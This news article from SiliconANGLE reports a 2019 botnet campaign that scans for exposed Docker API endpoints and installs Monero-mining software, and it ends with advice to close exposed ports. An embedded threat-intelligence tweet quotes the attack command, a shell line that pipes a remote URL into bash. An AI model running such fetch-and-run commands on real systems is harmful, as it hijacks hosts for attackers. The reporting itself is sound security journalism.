Unknown hackers have launched a new campaign that is actively scanning for vulnerable Docker instances to inject cryptomining code.
Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet. While efforts by hackers to find and hijack servers are regular, this case is specifically notable due to the volume, with those behind it scanning over 59,000 IP networks in an attempt to identify vulnerable instances.
“What set this campaign apart was the large uptick of scanning activity. This alone warranted further investigation to find out what this botnet was up to,” Troy Mursch, chief research officer and co-founder of Bad Packets told ZDNet. “This isn’t your average script kiddie exploit attempt… there was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.
Once a vulnerable Docker instance is located, a command is run to install the XMRRig script that hijacks the server to mine for the Monero cryptocurrency.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
“Command”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;'”,#threatintel pic.twitter.com/vxszV5SF1o
— Bad Packets Report (@bad_packets) November 25, 2019
Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain making transactions traceable, Monero is private and difficult if not nearly impossible to trace.
This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted using a runC vulnerability with access also gained by Docker’s remote API being open and public with Monero mining software installed. Last month, a cryptojacking worm dubbed “Gradoid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive it should – the hackers exploited Docker vulnerabilities to install Monero cryptomining code.
In this new campaign, as of Nov. 26 the miners may have been actively scanning but were yet to seriously profit. Mursch estimates that have only managed to mine 14.82 Monero (XMR) worth around $832.
Users who run Docker instances are being advised to check if they are exposing their API endpoints and if they are, close the ports and terminate unrecognized running containers.
Image: [email protected]/Flickr
Since you’re here …
Show your support for our mission by our 1-click subscribe to our YouTube Channel (below) — The more subscribers we have the more then YouTube’s algorithm promotes our content to users interested in #EnterpriseTech. Thank you.
Support Our Mission: >>>>>> SUBSCRIBE NOW >>>>>> to our Youtube Channel
… We’d like to tell you about our mission and how you can help us fulfill it. SiliconANGLE Media Inc.’s business model is based on the intrinsic value of the content, not advertising. Unlike many online publications, we don’t have a paywall or run banner advertising, because we want to keep our journalism open, without influence or the need to chase traffic.The journalism, reporting and commentary on SiliconANGLE — along with live, unscripted video from our Silicon Valley studio and globe-trotting video teams at theCUBE — take a lot of hard work, time and money. Keeping the quality high requires the support of sponsors who are aligned with our vision of ad-free journalism content.
If you like the reporting, video interviews and other ad-free content here, please take a moment to check out a sample of the video content supported by our sponsors, tweet your support, and keep coming back to SiliconANGLE.